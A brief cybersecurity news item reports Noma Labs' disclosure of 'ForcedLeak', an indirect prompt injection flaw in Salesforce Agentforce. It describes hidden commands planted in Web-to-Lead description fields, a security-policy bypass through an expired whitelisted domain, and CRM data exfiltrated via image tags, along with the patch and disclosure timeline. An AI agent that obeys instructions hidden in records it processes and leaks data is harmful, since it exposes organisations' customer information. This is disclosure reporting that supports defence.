CyberNews: 28/09/2025 Edition

Today’s roundup

Summary

Security researchers at Noma Labs disclosed a critical vulnerability (CVSS 9.4) in Salesforce Agentforce dubbed ForcedLeak, enabling attackers to exfiltrate CRM data through indirect prompt injection attacks. The flaw specifically affected organizations using Salesforce's Web-to-Lead functionality, where malicious actors could exploit the 42,000-character Description field to embed hidden commands. Attackers bypassed Salesforce’s Content Security Policy via an expired whitelisted domain, triggering unauthorized data leaks when AI agents processed poisoned lead records. Proof-of-concept attacks demonstrated how exfiltrated email addresses were encoded and transmitted via attacker-controlled image tags. Salesforce addressed the vulnerability on September 8, 2025, by enforcing strict URL allowlisting for AI model interactions. The disclosure timeline shows Noma Labs reported the flaw on July 28, with patches implemented six weeks later following coordinated disclosure.